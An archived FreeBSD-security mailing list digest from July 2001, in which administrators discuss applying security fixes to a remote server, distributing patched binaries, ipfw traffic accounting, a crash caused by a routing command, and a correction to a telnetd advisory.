List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 01:57 2001-07-26 +0100, Nuno Teixeira wrote: >Hello to all, > >At my workstation I'm tracking STABLE with no problems. > >At my server I just want to update the system with security fixes, etc. > >My question is: > >Tracking RELEASE_4_3 (for a RELEASE 4.3 system) is a good option, but >after makeworld and makekernel, I need to >go into single user mode and make installworld and mergemaster. > >The problem is that my server is at US and I live in Portugal! So, it's >impossible to run >the system in single user mode. > >What is the best way of maintain the system updated without single user mode? > >Patches? Packages? > >Thanks in advance, You can always be a daredevil and make installworld and run mergemaster in multiusermode, It usually works for me ;-) /TUBBS To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 18: 4:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id AE76137B403 for ; Wed, 25 Jul 2001 18:04:25 -0700 (PDT) (envelope-from sheldonh@starjuice.net) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.31 #1) id 15PZaR-0006HG-00; Thu, 26 Jul 2001 03:05:11 +0200 From: Sheldon Hearn To: Nuno Teixeira Cc: freebsd-security@freebsd.org Subject: Re: Updating security fixes without single user mode? In-reply-to: Your message of "Thu, 26 Jul 2001 01:57:30 +0100." <20010726015730.F5227@gateway.bogus> Date: Thu, 26 Jul 2001 03:05:11 +0200 Message-ID: <24133.996109511@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 26 Jul 2001 01:57:30 +0100, Nuno Teixeira wrote: > What is the best way of maintain the system updated without single user mode? > > Patches? Packages? Intelligent application of patches and careful rebuilding of affected binaries. This requires quite a good understanding of how the FreeBSD build fits together. You can get away with reading the advisories carefully. Should you ever need a patch that involves a change to the kernel, your SOL. You can do the installkernel, installworld and mergemaster in multiuser mode and hope for the best (as many people do) when you reboot. However, kernel changes on a release security branch are expected to be infrequent. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 18:17:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp2.netc.pt (smtp2.netc.pt [212.18.160.142]) by hub.freebsd.org (Postfix) with ESMTP id 1196137B401 for ; Wed, 25 Jul 2001 18:17:05 -0700 (PDT) (envelope-from admin@pt-quorum.com) Received: from gateway.bogus (p082-237.netc.pt) by smtp2.netc.pt (Sun Internet Mail Server sims.3.5.1999.05.24.18.28.p7) with ESMTP id <0GH200I8L3KDSE@smtp2.netc.pt>; Thu, 26 Jul 2001 02:17:03 +0100 (WET DST) Received: by gateway.bogus (Postfix, from userid 1001) id 015B87C80; Thu, 26 Jul 2001 02:18:26 +0100 (WEST) Date: Thu, 26 Jul 2001 02:18:26 +0100 From: Nuno Teixeira Subject: Re: Updating security fixes without single user mode? In-reply-to: <24133.996109511@axl.seasidesoftware.co.za>; from sheldonh@starjuice.net on Thu, Jul 26, 2001 at 03:05:11AM +0200 To: Sheldon Hearn Cc: freebsd-security@freebsd.org Message-id: <20010726021826.I5227@gateway.bogus> MIME-version: 1.0 Content-type: text/plain; charset=iso-8859-1 Content-disposition: inline Content-transfer-encoding: 8BIT User-Agent: Mutt/1.2.5i X-Operating-System: FreeBSD 4.3-STABLE References: <20010726015730.F5227@gateway.bogus> <24133.996109511@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jul 26, 2001 at 03:05:11AM +0200, Sheldon Hearn wrote: > > > On Thu, 26 Jul 2001 01:57:30 +0100, Nuno Teixeira wrote: > > > What is the best way of maintain the system updated without single user mode? > > > > Patches? Packages? > > Intelligent application of patches and careful rebuilding of affected > binaries. This requires quite a good understanding of how the FreeBSD > build fits together. You can get away with reading the advisories > carefully. > > Should you ever need a patch that involves a change to the kernel, your > SOL. You can do the installkernel, installworld and mergemaster in > multiuser mode and hope for the best (as many people do) when you > reboot. > > However, kernel changes on a release security branch are expected to be > infrequent. > > Ciao, > Sheldon. Hi, Just one more question: Tracking RELEASE_4_3 include fixing for all problems listed in " http://www.freebsd.org/security/index.html#adv "? Thanks, -- -- Nuno Teixeira Dir. Técnico pt-quorum.com -- PGP Public Key: http://www.pt-quorum.com/pgp/nunoteixeira.asc Key fingerprint: 8C2C B364 D4DC 0C92 56F5 CE6F 8F07 720A 63A0 4FC7 -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 18:23:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp2.netc.pt (smtp2.netc.pt [212.18.160.142]) by hub.freebsd.org (Postfix) with ESMTP id 4D3EA37B401 for ; Wed, 25 Jul 2001 18:23:33 -0700 (PDT) (envelope-from admin@pt-quorum.com) Received: from gateway.bogus (p082-237.netc.pt) by smtp2.netc.pt (Sun Internet Mail Server sims.3.5.1999.05.24.18.28.p7) with ESMTP id <0GH200IEM3V6SE@smtp2.netc.pt>; Thu, 26 Jul 2001 02:23:32 +0100 (WET DST) Received: by gateway.bogus (Postfix, from userid 1001) id 394297C80; Thu, 26 Jul 2001 02:24:56 +0100 (WEST) Date: Thu, 26 Jul 2001 02:24:56 +0100 From: Nuno Teixeira Subject: Re: Updating security fixes without single user mode? In-reply-to: <20010726021826.I5227@gateway.bogus>; from nuno.teixeira@pt-quorum.com on Thu, Jul 26, 2001 at 02:18:26AM +0100 To: freebsd-security@freebsd.org Message-id: <20010726022455.J5227@gateway.bogus> MIME-version: 1.0 Content-type: text/plain; charset=iso-8859-1 Content-disposition: inline Content-transfer-encoding: 8BIT User-Agent: Mutt/1.2.5i X-Operating-System: FreeBSD 4.3-STABLE References: <20010726015730.F5227@gateway.bogus> <24133.996109511@axl.seasidesoftware.co.za> <20010726021826.I5227@gateway.bogus> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jul 26, 2001 at 02:18:26AM +0100, Nuno Teixeira wrote: > On Thu, Jul 26, 2001 at 03:05:11AM +0200, Sheldon Hearn wrote: > > > > > > On Thu, 26 Jul 2001 01:57:30 +0100, Nuno Teixeira wrote: > > > > > What is the best way of maintain the system updated without single user mode? > > > > > > Patches? Packages? > > > > Intelligent application of patches and careful rebuilding of affected > > binaries. This requires quite a good understanding of how the FreeBSD > > build fits together. You can get away with reading the advisories > > carefully. > > > > Should you ever need a patch that involves a change to the kernel, your > > SOL. You can do the installkernel, installworld and mergemaster in > > multiuser mode and hope for the best (as many people do) when you > > reboot. > > > > However, kernel changes on a release security branch are expected to be > > infrequent. > > > > Ciao, > > Sheldon. > > Hi, > > Just one more question: > > Tracking RELEASE_4_3 include fixing for all problems listed in " http://www.freebsd.org/security/index.html#adv "? > > Thanks, > > -- Hi, Just one more question: Tracking RELEASE_4_3 include fixing for all problems listed in " http://www.freebsd.org/security/index.html#adv "? Thanks, -- -- Nuno Teixeira Dir. Técnico pt-quorum.com -- PGP Public Key: http://www.pt-quorum.com/pgp/nunoteixeira.asc Key fingerprint: 8C2C B364 D4DC 0C92 56F5 CE6F 8F07 720A 63A0 4FC7 -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 19:15:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id E484437B401 for ; Wed, 25 Jul 2001 19:15:46 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 0944066E04; Wed, 25 Jul 2001 19:15:45 -0700 (PDT) Date: Wed, 25 Jul 2001 19:15:45 -0700 From: Kris Kennaway To: Nuno Teixeira Cc: Sheldon Hearn , freebsd-security@FreeBSD.ORG Subject: Re: Updating security fixes without single user mode? Message-ID: <20010725191545.B3833@xor.obsecurity.org> References: <20010726015730.F5227@gateway.bogus> <24133.996109511@axl.seasidesoftware.co.za> <20010726021826.I5227@gateway.bogus> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="uZ3hkaAS1mZxFaxD" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010726021826.I5227@gateway.bogus>; from nuno.teixeira@pt-quorum.com on Thu, Jul 26, 2001 at 02:18:26AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --uZ3hkaAS1mZxFaxD Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Thu, Jul 26, 2001 at 02:18:26AM +0100, Nuno Teixeira wrote: > Tracking RELEASE_4_3 include fixing for all problems listed in " http://www.freebsd.org/security/index.html#adv "? s/RELEASE_4_3/RELENG_4_3/ Yes. Kris --uZ3hkaAS1mZxFaxD Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7X31RWry0BWjoQKURAlQ5AJ0Xe3FYzMwmUbAGqHYqSM/GcIUcHACgytnq kfXPqA9mGeQoEPwcBB4WaMY= =5RuA -----END PGP SIGNATURE----- --uZ3hkaAS1mZxFaxD-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 20:51: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from iguana.hypnoticlizard.com (calnet23-208.gtecablemodem.com [207.175.246.208]) by hub.freebsd.org (Postfix) with ESMTP id 4406E37B401 for ; Wed, 25 Jul 2001 20:50:58 -0700 (PDT) (envelope-from charlie@iguana.hypnoticlizard.com) Received: (from charlie@localhost) by iguana.hypnoticlizard.com (8.11.4/8.11.2) id f6Q3qIY00447 for freebsd-security@freebsd.org; Wed, 25 Jul 2001 20:52:18 -0700 (PDT) (envelope-from charlie) Content-Type: text/plain; charset="iso-8859-1" From: Charlie Baysinger To: freebsd-security@freebsd.org Subject: syslogd with the -l option Date: Wed, 25 Jul 2001 20:52:18 -0700 X-Mailer: KMail [version 1.2] MIME-Version: 1.0 Message-Id: <01072520521800.00375@iguana.hypnoticlizard.com> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, How (in)secure is using the syslogd "-l" option to open an additional log socket inside a FreeBSD jail from the host system ? What is recommended for consolidating jail logs ? Thank you for any suggestions. -- Charlie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 0:32:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from star.rila.bg (star.rila.bg [212.39.75.32]) by hub.freebsd.org (Postfix) with ESMTP id A93A537B407 for ; Thu, 26 Jul 2001 00:32:17 -0700 (PDT) (envelope-from vlady@star.rila.bg) Received: from star.rila.bg (vlady@localhost [127.0.0.1]) by star.rila.bg (8.11.4/8.11.4) with ESMTP id f6Q7Wrc36388 for ; Thu, 26 Jul 2001 10:32:53 +0300 (EEST) (envelope-from vlady@star.rila.bg) Message-Id: <200107260732.f6Q7Wrc36388@star.rila.bg> X-Mailer: exmh version 2.4 05/15/2001 with nmh-1.0.3 To: freebsd-security@freebsd.org From: "Vladimir Terziev" Subject: Compilation problem with ssh-3.0.1 on FreeBSD 4.3-STABLE box Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 26 Jul 2001 10:32:53 +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi all, I've downloaded a copy of ssh-3.0.1 from ftp.ssh.com. I've tryed to compile it but I've got an error. Has anybody succeeded to compile ssh-3.0.1 (ssh from ssh.com) ? regards, Vladimir To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 1:32: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from xs4nobody.nl (xs4nobody.nl [62.58.36.22]) by hub.freebsd.org (Postfix) with SMTP id EE6CC37B401 for ; Thu, 26 Jul 2001 01:32:01 -0700 (PDT) (envelope-from bart@xs4nobody.nl) Received: (qmail 24073 invoked by uid 1000); 26 Jul 2001 08:31:54 -0000 Date: Thu, 26 Jul 2001 10:31:54 +0200 From: Bart Matthaei To: freebsd-security@freebsd.org Subject: Route makes my machine crash.. (weird bug) Message-ID: <20010726103154.A24057@heresy.xs4nobody.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, i discovered something really odd last night. It happened twice.. i checked if it wasn't a one-timer.. This is the deal: 62.58.36.22 - xs4nobody.nl -> 10.0.0.1 - tunnel-remote | -> 10.0.0.2 - tunnel-home ( real ip = 212.58.188.107 ) 62.58.36.169 - lust.xs4nobody.nl (ip of my gateway at home. the ip is routed via the 10.0.0 gif tunnel) Ok. I use ipfw to forward all the packets coming from my /30 into the tunnel.. So on my gateway, i use: ipfw add $some security stuff for my indy ( with 62.58.36 ip ) and lust. ipfw add fwd 10.0.0.1 all from 62.58.36.168/30 to any now.. i use ipfw so i dont have to set a default route on my gateway via the tunnel ( every leech or download would go over the tunnel, and i'd rather have that kind of stuff over my normal quicknet ip ( less latency ) ) only my indy uses the tunnel by default. ok.. last night i wanted to add a route so that all the traffic to 62.58.63.29 ( alias on xs4nobody.nl box ) via the tunnel.. So (i tried to route it directly to 10.0.0.1 ) i used " route add 62.58.36.29 10.0.0.1 " .. i did it remote.. my connection promptly died.. when i got home, i saw that my screensaver on my freebsd box was frozen.. i tried to reach the machine via my internal network, but it was totally crashed.. So, i rebooted. and tried again to test if it was a bug... this time, i got the routed it to the tunneled ip of my gateway, with the hope that my firewall would understand it and routed it to 10.0.0.1 via ipfw .. "route add 62.58.36.29 62.58.36.169 " .. *POOF* the box crashed again.. So i started thinking.. The problem is, i guess, i'm routing the stuff to my own IP (wich shouldn't really be a problem, but could cause the error because i use ipfw instead of a static route) .. So the routingtable screwes up.. _BUT_ .. It shouldn't cause my machine to crash.. Can anybody test this on other freebsd releases ? I use freebsd 4.3-STABLE.. 4.3-RELEASE (one of a week ago) does the same thing.. With regards, Bart Matthaei -- Bart Matthaei | bart@xs4nobody.nl | +31 6 24907042 Cysonet Managed Hosting | bart@cysonet.com ------------------------------------------------- /* It's always funny until someone gets hurt.. * (and then it's just hilarious) */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 4:20:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id 252FE37B405 for ; Thu, 26 Jul 2001 04:20:19 -0700 (PDT) (envelope-from nkritsky@internethelp.ru) Received: from IBMKA (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with ESMTP id PAA11769; Thu, 26 Jul 2001 15:19:42 +0400 (MSD) Date: Thu, 26 Jul 2001 15:19:44 +0400 From: "Nickolay A.Kritsky" X-Mailer: The Bat! (v1.49) Personal Reply-To: "Nickolay A.Kritsky" Organization: IHelp X-Priority: 3 (Normal) Message-ID: <19360186994.20010726151944@internethelp.ru> To: Nuno Teixeira Cc: freebsd-security@FreeBSD.ORG Subject: Re: Updating security fixes without single user mode? In-reply-To: <20010726015730.F5227@gateway.bogus> References: <20010726015730.F5227@gateway.bogus> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Nuno, Thursday, July 26, 2001, 4:57:30 AM, you wrote: NT> Hello to all, NT> At my workstation I'm tracking STABLE with no problems. NT> At my server I just want to update the system with security fixes, etc. NT> My question is: NT> Tracking RELEASE_4_3 (for a RELEASE 4.3 system) is a good option, but after makeworld and makekernel, I need to NT> go into single user mode and make installworld and mergemaster. NT> The problem is that my server is at US and I live in Portugal! So, it's impossible to run NT> the system in single user mode. NT> What is the best way of maintain the system updated without single user mode? NT> Patches? Packages? NT> Thanks in advance, Correct me if I am wrong, but AFAIK the only reason to run installkernel in single-user mode is that some permissions cannot cannot be overrided by root in securelevel >1 . So the first way is obvious - run with securelevel 0. If you don't like it you can do something like this: add following lines to your /etc/rc if [ -f "/etc/rc.singluser" ] then /etc/rc.singluser rm /etc/rc.singleuser reboot fi ;------------------------------------------- ; NKritsky ; SysAdmin InternetHelp.Ru ; http://www.internethelp.ru ; mailto:nkritsky@internethelp.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 4:26:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from vindaloo.allsolutions.com.au (vindaloo.allsolutions.com.au [203.111.24.54]) by hub.freebsd.org (Postfix) with ESMTP id 4A2C137B403 for ; Thu, 26 Jul 2001 04:26:46 -0700 (PDT) (envelope-from David_May@allsolutions.com.au) Received: from roganjosh.allsolutions.com.au (roganjosh.allsolutions.com.au [192.9.200.253]) by vindaloo.allsolutions.com.au (8.9.3/8.9.3) with ESMTP id TAA02121 for ; Thu, 26 Jul 2001 19:26:38 +0800 (WST) (envelope-from David_May@allsolutions.com.au) From: David_May@allsolutions.com.au Subject: [Q] distribution of patched binaries for security fixes. To: Date: Thu, 26 Jul 2001 18:47:21 +0800 Message-ID: X-MIMETrack: Serialize by Router on Perth/All Solutions(Release 5.0.7 |March 21, 2001) at 07/26/2001 07:26:39 PM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, I am setting up a FreeBSD machine to track the STABLE branch and to rebuild the system from time-to-time. The main reason being to keep track of security related fixes and enhancents.The documentation covers that quite well. But I was wondering what is a good procedure to distribute updated binaries to other machines. I several have production machines that I would like to keep up-to-date but do not want to compile source on every machine. Being able to create something like a Windows NT service pack would be nice :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 4:37: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 3418637B407 for ; Thu, 26 Jul 2001 04:36:59 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id C62DA67226; Thu, 26 Jul 2001 04:36:57 -0700 (PDT) Date: Thu, 26 Jul 2001 04:36:57 -0700 From: Kris Kennaway To: David_May@allsolutions.com.au Cc: freebsd-security@FreeBSD.ORG Subject: Re: [Q] distribution of patched binaries for security fixes. Message-ID: <20010726043657.B42611@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="DKU6Jbt7q3WqK7+M" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from David_May@allsolutions.com.au on Thu, Jul 26, 2001 at 06:47:21PM +0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --DKU6Jbt7q3WqK7+M Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jul 26, 2001 at 06:47:21PM +0800, David_May@allsolutions.com.au wro= te: > Hello, I am setting up a FreeBSD machine to track the STABLE branch > and to rebuild the system from time-to-time. The main reason being to > keep track of security related fixes and enhancents.The documentation > covers that quite well. >=20 > But I was wondering what is a good procedure to distribute updated > binaries to other machines. I several have production machines that I > would like to keep up-to-date but do not want to compile source on > every machine. >=20 > Being able to create something like a Windows NT service pack > would be nice :) There are any number of tools you can use to distribute files: tar + scp, rsync, cvsup, 'make release' to make a full installation mirror, etc. If you want to automate the installation further you could create your own packages using pkg_create: this is very easy to do if you use the ports framework. Kris --DKU6Jbt7q3WqK7+M Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7YADYWry0BWjoQKURAvMYAKDG4Nc2806LifWrrezb0w1frRynKACg1s55 yg4P/w6eckDppNTbORkS7gc= =fytW -----END PGP SIGNATURE----- --DKU6Jbt7q3WqK7+M-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 6:19:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from APastourelles-102-1-2-26.abo.wanadoo.fr (APastourelles-102-1-2-26.abo.wanadoo.fr [217.128.208.26]) by hub.freebsd.org (Postfix) with ESMTP id 1D21337B401 for ; Thu, 26 Jul 2001 06:19:50 -0700 (PDT) (envelope-from olive@deep-ocean.net) Received: by APastourelles-102-1-2-26.abo.wanadoo.fr (Postfix, from userid 1001) id F342D2556E; Thu, 26 Jul 2001 15:19:48 +0200 (CEST) Date: Thu, 26 Jul 2001 15:19:48 +0200 From: Olivier Cortes To: freebsd-security@freebsd.org Subject: Re: Re: [Q] distribution of patched binaries for security fixes. Message-ID: <20010726151948.A95770@APastourelles-102-1-2-26.abo.wa> Mail-Followup-To: Olivier Cortes , freebsd-security@freebsd.org References: <20010726043657.B42611@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010726043657.B42611@xor.obsecurity.org>; from kris@obsecurity.org on Thu, Jul 26, 2001 at 04:36:57AM -0700 X-Operating-System: FreeBSD 4.3-RC i386 up 7 days, 10:35, 1 user, load averages: 0.14, 0.25, 0.17 Organization: Deep-Ocean Network X-URL: http://www.deep-ocean.net/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jul 26, 2001 at 04:36:57AM -0700, Kris Kennaway wrote: > There are any number of tools you can use to distribute files: tar + > scp, rsync, cvsup, 'make release' to make a full installation mirror, > etc. If you want to automate the installation further you could > create your own packages using pkg_create: this is very easy to do if > you use the ports framework. Here i make heavy use of rsync + scp tu update my web sites mirror. i didn't thought about it to sync my systems... saying that every BSD machine is in securelevel 2 with [/usr]/[s]bin[/*] chflaged to schg, do you think that "pkg_create" is a better solution than make world on every one ? (i've got 4 FreeBSD 4.3-STABLE). [i remember some persons didn't agree with this protection method. do you have any URL to point me to in order to discuss this subject (again ?)] with pkg_create, do i pack the binaries ? do i pack everything in the dirs mentioned before ? how to trace only the changed binaries (the cvsup log ?) ? which method do you prefer ? (for now i make world everywhere...) is there any URL or doc where some of them are already discussed (in order not to spend your time on it) ? regards, --- Olivier Cortes free software admin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 6:21:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id 70DF337B401 for ; Thu, 26 Jul 2001 06:21:04 -0700 (PDT) (envelope-from nkritsky@internethelp.ru) Received: from IBMKA (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with ESMTP id RAA95159 for ; Thu, 26 Jul 2001 17:20:58 +0400 (MSD) Date: Thu, 26 Jul 2001 17:21:01 +0400 From: "Nickolay A.Kritsky" X-Mailer: The Bat! (v1.49) Personal Reply-To: "Nickolay A.Kritsky" Organization: IHelp X-Priority: 3 (Normal) Message-ID: <7167463367.20010726172101@internethelp.ru> To: security@FreeBSD.ORG Subject: accounting with ipfw (gid, uid riles) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, all. I am not sure, if my question has something to do with security, but people in this list have some _huge_ amount of ipfw,natd and TCP/IP experience, which they can share with me. :) I have started accounting of ip traffic on my ISP2office gateway. I want to implement this via 'ipfw add count' command, using its 'gid' and 'uid' parameters. I have put some counters: rule 19 is quite simple 00019 count ip from any to any via rl0 it shows me how much packets was seen on interface rl0 (it is my external interface) rule 1010 contains of some rules which should count all traffic generated by the router itself, sorted by uid 01010 count ip from any to 212.113.112.145 via rl0 01010 count ip from 212.113.112.145 to any via rl0 01010 count ip from any to 212.113.112.145 uid nobody via rl0 01010 count ip from any to 212.113.112.145 uid root via rl0 01010 count ip from any to 212.113.112.145 uid httpd via rl0 01010 count ip from any to 212.113.112.145 uid ftp via rl0 01010 count ip from 212.113.112.145 to any uid nobody via rl0 01010 count ip from 212.113.112.145 to any uid root via rl0 01010 count ip from 212.113.112.145 to any uid httpd via rl0 01010 count ip from 212.113.112.145 to any uid ftp via rl0 su-2.03# ipfw show 19 1010 <-------------------------start------------------------> 00019 3215329 1163463543 count ip from any to any via rl0 01010 1118838 920747034 count ip from any to 212.113.112.145 via rl0 01010 1224240 90608036 count ip from 212.113.112.145 to any via rl0 01010 2098 231284 count ip from any to 212.113.112.145 uid nobody via rl0 01010 913617 710773596 count ip from any to 212.113.112.145 uid root via rl0 01010 117 8768 count ip from any to 212.113.112.145 uid httpd via rl0 01010 0 0 count ip from any to 212.113.112.145 uid ftp via rl0 01010 7660 466991 count ip from 212.113.112.145 to any uid nobody via rl0 01010 963148 79260085 count ip from 212.113.112.145 to any uid root via rl0 01010 36 1566 count ip from 212.113.112.145 to any uid httpd via rl0 01010 0 0 count ip from 212.113.112.145 to any uid ftp via rl0 <-------------------------end--------------------------> according to sockstat, the only users that currently have allocated sockets are nobody,httpd,ftp,root - Squid,Apache,ftpd,everything other (in the same order). "Everything other" are mostly sendmail, popper and natd. Here are the questions: why the whole traffic to and from router is 920747034 + 90608036 = 1011355070 but sum of traffic counters sorted by uid are 231284 + 710773596 + 8768 + 0 + 466991 + 79260085 + 1566 + 0 = 790742290 difference is big 1011355070 - 790742290 = 220612780 > 210 Mb where did I make an error, or who is lying to me here: ipfw, sockstat? Did anybody used uid,gid sorting in ipfw, is it reliable? So many questions... Any help is very good. NK ;------------------------------------------- ; NKritsky ; SysAdmin InternetHelp.Ru ; http://www.internethelp.ru ; mailto:nkritsky@internethelp.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 6:22:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from prime.gushi.org (prime.gushi.org [208.23.118.172]) by hub.freebsd.org (Postfix) with ESMTP id 2E14637B409; Thu, 26 Jul 2001 06:22:37 -0700 (PDT) (envelope-from danm@prime.gushi.org) Received: from localhost (danm@localhost) by prime.gushi.org (8.11.3/8.11.3) with ESMTP id f6QDJLL09461; Thu, 26 Jul 2001 09:19:21 -0400 (EDT) Date: Thu, 26 Jul 2001 09:19:20 -0400 (EDT) From: "Dan Mahoney, System Admin" To: security@freebsd.org Cc: security-officer@freebsd.org Subject: Mistake in security advisory. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'd like to point out what I think is a slight error in the security advisory, although I may be wrong about this. Watch for my c-style comments below: # ls /usr/src/crypto/telnet/telnetd A response of ls: /usr/src/crypto/telnet/telnetd: No such file or directory indicates you do not have the sources present and should download the non-crypto-telnet patch. These patches have been verified to apply to FreeBSD 4.2-RELEASE, 4.3-RELEASE and 3.5.1-STABLE dated prior to 2001-07-20 (users of 3.5.1-RELEASE must have applied the patches from FreeBSD Security Advisory 00:69 prior to applying this patch). These patches may or may not apply to older, unsupported releases of FreeBSD. 2a) For systems with the crypto-telnet sources installed Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd-crypto.patch 